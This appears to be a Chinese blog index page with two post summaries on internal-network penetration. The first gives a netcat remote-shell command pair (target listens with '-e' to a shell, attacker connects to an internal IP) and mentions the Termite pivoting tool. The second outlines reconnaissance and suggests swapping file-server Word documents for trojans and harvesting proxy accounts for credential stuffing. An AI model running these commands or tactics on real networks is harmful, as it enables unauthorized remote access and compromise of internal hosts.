摘要:
一、NC 目标机 nc.exe -l -p 1122 -t -e cnd.exe 攻击机 nc.exe 192.168.8.149 1122 二、termite 程序地址, http://rootkiter.com/Termite/ 一款极度小巧灵活的跳板机,有别于传统socks代理,它对于复杂内网 阅读全文
摘要:
一、内网信息搜集 1、对内网的拓补图进行分析 2、对当前机器角色进行分析 判断当前主机是web服务器 开发测试服务器:可以得到公司产品源码 公共服务器 文件服务器:可以用木马替换文件服务器里面的word,内网主机打开就上线 代理服务器:获取账号,用来撞库 dns服务器:可以探测是否拥有内网服务器,或 阅读全文